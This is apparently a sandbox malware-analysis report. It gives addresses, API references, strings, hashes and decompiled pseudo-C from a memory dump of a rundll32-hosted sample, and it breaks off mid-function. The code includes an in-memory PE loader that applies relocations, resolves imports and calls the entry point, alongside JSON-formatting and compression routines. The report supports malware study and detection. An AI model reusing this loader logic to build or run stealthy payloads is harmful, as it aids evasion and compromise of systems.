0x041bf2a5
0x041bf2a8
0x041bf2aa
0x041bf2ad
0x041bf2b0
0x041bf2b0
0x041bf2b9
0x041bf2bc
0x041bf2be
0x00000000
0x00000000
0x041bf2c2
0x00000000
0x041bf2c2
0x041bf133
0x00000000

APIs

memset.MSVCRT ref: 041BF070
memset.MSVCRT ref: 041BF081

Part of subcall function 041B92A2: memset.MSVCRT ref: 041B92B4

GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 041BF164

Strings

GET, xrefs: 041BF1C9, 041BF1DF
POST, xrefs: 041BF1C2

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: memset$ErrorLast
String ID: GET$POST
API String ID: 2570506013-3192705859
Opcode ID: fda1794038abb7334e57fdde7bff2816537d24596c6efb2362dbee199807df8d
Instruction ID: ff23e8cfa833957af31d01ae730dc3a416b85b36012e8b4ecae9b537a51dd0c6
Opcode Fuzzy Hash: fda1794038abb7334e57fdde7bff2816537d24596c6efb2362dbee199807df8d
Instruction Fuzzy Hash: DEA1A4B1901218AFEB54DFA5DC84AEEBBB8EF48314F108069F555E7250DB74AD82CF90

Uniqueness

Uniqueness Score: -1.00%

Function 041C1CE9 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 041C1D69
qsort.MSVCRT ref: 041C1FE7

Strings

false, xrefs: 041C1D4C
null, xrefs: 041C1D2E
%I64d, xrefs: 041C1D5B
true, xrefs: 041C1D40

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: f360092c256ad6ce6d4762635c9e9e5e38d0f01ca2e8cc370615f6895aecf989
Instruction ID: b52a8ccf5bf2d18882d2a7517922091708345b59ec595c61806a2f93cb442786
Opcode Fuzzy Hash: f360092c256ad6ce6d4762635c9e9e5e38d0f01ca2e8cc370615f6895aecf989
Instruction Fuzzy Hash: FFE16AB2A4020ABBEF15DE64DCC6EAB3B79EF24244F00845DFD1596141E731EA618FA0

Uniqueness

Uniqueness Score: -1.00%

Function 041C4646 Relevance: 9.3, APIs: 6, Instructions: 329
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E041C4646(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t220;
				signed int _t237;
				void* _t277;
				signed int _t282;
				signed int _t284;
				intOrPtr _t324;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t324 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t324;
				if(_t324 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							E041C43F4(GetCurrentProcess(),  *0x41d0fe4, _t203, _a4, _a4);
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t220 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t220 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t237 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t237 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t277 = 0xfffffffd;
							return _t277;
						}
					}
					goto L35;
				}
				_t282 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t282 * 5));
				_t284 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t284 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}

0x041c464f
0x041c465c
0x041c4662
0x041c466b
0x041c466e
0x041c4671
0x00000000
0x041c4762
0x041c4766
0x041c4768
0x041c4776
0x041c4894
0x041c4898
0x041c4960
0x041c4969
0x041c496c
0x041c4970
0x041c4976
0x041c497e
0x041c497e
0x041c4986
0x041c499c
0x041c49af
0x041c49b2
0x041c49b6
0x041c49bc
0x041c49cc
0x041c49f7
0x00000000
0x041c49f9
0x041c49d2
0x041c49e3
0x00000000
0x041c49f1
0x041c49f5
0x00000000
0x041c49f1
0x041c49e5
0x041c49e9
0x041c49ee
0x00000000
0x041c49ee
0x041c49d4
0x041c49d8
0x041c49da
0x00000000
0x041c49da
0x041c49be
0x041c49c2
0x00000000
0x041c49c4
0x041c489e
0x041c48a2
0x041c48a4
0x041c48b2
0x00000000
0x00000000
0x041c48b8
0x041c48c1
0x041c48cf
0x041c48db
0x041c48e7
0x041c48f0
0x041c48f3
0x041c48f7
0x041c48f9
0x041c4906
0x041c491a
0x041c4929
0x041c493a
0x041c4903
0x00000000
0x041c4903
0x041c493c
0x041c4940
0x041c4945
0x00000000
0x041c4945
0x041c4950
0x00000000
0x00000000
0x041c4952
0x041c4956
0x00000000
0x041c4958
0x041c477c
0x041c4785
0x041c4793
0x041c4796
0x041c47b3
0x041c47ba
0x041c47cc
0x041c47cc
0x041c47d3
0x041c47e3
0x041c47fb
0x041c47e5
0x041c47ed
0x041c47ed
0x041c47fe
0x041c4802
0x041c4812
0x041c4835
0x041c4847
0x041c4814
0x041c4828
0x041c4828
0x041c4851
0x041c486d
0x041c4853
0x041c4862
0x041c4862
0x041c4875
0x041c487e
0x041c487e
0x041c488c
0x00000000
0x041c47d5
0x041c47d7
0x00000000
0x041c47d7
0x041c47d3
0x00000000
0x041c4796
0x041c4679
0x041c4687
0x041c468c
0x041c4697
0x041c469a
0x041c469e
0x041c46a0
0x041c46b0
0x041c46b9
0x041c46c2
0x041c46ca
0x041c46d3
0x041c46de
0x041c46e4
0x041c46e7
0x041c46ea
0x041c46f1
0x041c46f8
0x00000000
0x00000000
0x041c4703
0x041c4711
0x041c471c
0x041c4726
0x041c473e
0x041c474b
0x041c474b
0x041c4728
0x041c4733
0x041c4733
0x041c4752
0x041c4752
0x041c475a
0x041c475a
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 041C47AD
LoadLibraryA.KERNEL32(00000000), ref: 041C47C6
GetProcAddress.KERNEL32(00000000,?), ref: 041C4822
GetProcAddress.KERNEL32(00000000,?), ref: 041C4841
lstrcmpA.KERNEL32(?,00000000), ref: 041C4932
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 041C498F

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: AddressProc$CurrentHandleLibraryLoadModuleProcesslstrcmp
String ID:
API String ID: 2598995400-0
Opcode ID: 50c481efc08cf4bc195354fb75df5c0f6944f54c9dcb5556d8462fe9b96dc24c
Instruction ID: 06557748ec44650371c6ee5fc6674609a78305da64388ca3c1bb09c46dd70153
Opcode Fuzzy Hash: 50c481efc08cf4bc195354fb75df5c0f6944f54c9dcb5556d8462fe9b96dc24c
Instruction Fuzzy Hash: C1E1BE75E08219DFDB14CFA8C891BADBBB1FF18314F1485AAE815AB391D734A981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 041BD2F3 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 041BD307
SysAllocString.OLEAUT32(?), ref: 041BD30F
SysAllocString.OLEAUT32(00000000), ref: 041BD323
SysFreeString.OLEAUT32(?), ref: 041BD39E
SysFreeString.OLEAUT32(?), ref: 041BD3A1
SysFreeString.OLEAUT32(?), ref: 041BD3A6

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: dfe8ec133177a3518e153d06b5497069b46a268141f0847010f3cc332bfd8923
Instruction ID: 78282d1c80c2ebfc5eff616ba8dfa84ca77933d7a32a44d6385cd3336f1b3461
Opcode Fuzzy Hash: dfe8ec133177a3518e153d06b5497069b46a268141f0847010f3cc332bfd8923
Instruction Fuzzy Hash: 5F212BB5900218BFDB04DFA5CD88DEEBBBCEF48254B10449AF505E7250D775AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 041C222E Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X\u%04X, xrefs: 041C2387
\u%04X, xrefs: 041C2348
@, xrefs: 041C229C

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 4e8339e68a67e94e445e2dcaad0585e5dbeb3deabe74d7e7ce31701f53814a4e
Instruction ID: 465dfc9e077f42347b5fa2de2b4a35436652d8bb057eff32a2a1aad84e8088e0
Opcode Fuzzy Hash: 4e8339e68a67e94e445e2dcaad0585e5dbeb3deabe74d7e7ce31701f53814a4e
Instruction Fuzzy Hash: BF41C031E00209A7EB294DAD9EC9BBE3B149F79344F1414EDFD02E6684E371F99192D2

Uniqueness

Uniqueness Score: -1.00%

Function 041C3BFE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E041C3BFE(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L041C3D57();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E041C3BD7(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E041B9227(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x41c23e9
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}

0x041c3bfe
0x041c3c01
0x041c3c06
0x041c3c0a
0x041c3c0a
0x041c3c10
0x041c3c14
0x041c3c15
0x041c3c18
0x041c3c19
0x041c3c1e
0x041c3c21
0x041c3c22
0x041c3c27
0x041c3c2e
0x041c3cb7
0x041c3cb7
0x00000000
0x041c3c39
0x041c3c3a
0x041c3c4c
0x041c3c72
0x041c3c72
0x041c3c7b
0x041c3c7d
0x041c3c83
0x041c3cb2
0x041c3cb2
0x041c3cba
0x041c3cbd
0x041c3cbd
0x041c3c85
0x041c3c86
0x041c3c8c
0x041c3c8e
0x041c3c8e
0x041c3c93
0x041c3c92
0x041c3c92
0x041c3c9a
0x041c3ca6
0x041c3cb0
0x041c3cb0
0x00000000
0x041c3c5c
0x041c3c5c
0x041c3c5c
0x041c3c62
0x00000000
0x00000000
0x041c3c64
0x041c3c6a
0x041c3c6f
0x00000000
0x041c3c6f
0x041c3c4c

APIs

_snprintf.MSVCRT ref: 041C3C22
strchr.MSVCRT ref: 041C3C42
strchr.MSVCRT ref: 041C3C51
strchr.MSVCRT ref: 041C3C76

Strings

%.*g, xrefs: 041C3C19

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: strchr$_snprintf
String ID: %.*g
API String ID: 3619936089-952554281
Opcode ID: 6adaa74beb85aeec141fa88a1801dd1eb927622ef63937cde68cfaf1c169d7d3
Instruction ID: 32e81a19d882fdbdef3de77922f43fff69d9a1b2170e2eb4254d10402b5af66a
Opcode Fuzzy Hash: 6adaa74beb85aeec141fa88a1801dd1eb927622ef63937cde68cfaf1c169d7d3
Instruction Fuzzy Hash: 7421272260065D26E7265E189CC5FAE379C9F21328F19C1AEFC7486580E7A0B96443D9

Uniqueness

Uniqueness Score: -1.00%

Function 041C3D9F Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E041C3D9F(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E041B93DC(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x041c3d9f
0x041c3da5
0x041c3dad
0x041c3dc2
0x041c3dd4
0x041c3de0
0x041c3de6
0x041c3deb
0x041c3df7
0x041c3f62
0x00000000
0x041c3f62
0x041c3dfd
0x041c3e06
0x041c3e14
0x041c3e17
0x041c3e26
0x041c3e26
0x041c3e2d
0x041c3e3b
0x041c3e3e
0x041c3e4e
0x041c3e5b
0x041c3e62
0x041c3e72
0x041c3e84
0x041c3e8a
0x041c3e74
0x041c3e7c
0x041c3e7c
0x041c3e8d
0x041c3e91
0x041c3e9d
0x041c3ea1
0x041c3ea5
0x041c3ea9
0x041c3eb5
0x041c3ee0
0x041c3ee8
0x041c3eee
0x041c3efa
0x041c3f06
0x041c3eb7
0x041c3ebc
0x041c3ec7
0x041c3ed3
0x041c3ed3
0x041c3f0f
0x041c3f15
0x041c3f1f
0x041c3f3b
0x041c3f21
0x041c3f24
0x041c3f30
0x041c3f30
0x041c3f1f
0x041c3f43
0x041c3f4c
0x041c3f4c
0x041c3f5a
0x00000000
0x041c3f5a
0x041c3e66
0x00000000
0x041c3e66
0x00000000
0x041c3e3e
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 041C3DBC
LoadLibraryA.KERNEL32(00000000), ref: 041C3E55

Strings

GetProcAddress, xrefs: 041C3DC5
kernel32.dll, xrefs: 041C3DB7

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 2f4d619cc2574ef7f2ff92d210abb18af2ea50d26cca622f2789017ec716f75d
Instruction ID: b1a5ccf04b54d05ae3daa8a8f79f765fa5460677600314f3f3924b0412d17a48
Opcode Fuzzy Hash: 2f4d619cc2574ef7f2ff92d210abb18af2ea50d26cca622f2789017ec716f75d
Instruction Fuzzy Hash: F9618E75E00209EFDB04CF98C885BADBBF1FF18315F248599E825AB291D374AA80DF50

Uniqueness

Uniqueness Score: -1.00%

Function 041C4BF0 Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E041C4BF0(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x40f8458b
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0x1d0fd8a1
					_t12 = _t272 + 0x5c; // 0x54e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E041C7C10(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E041C6970(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x54e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E041C6AB0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
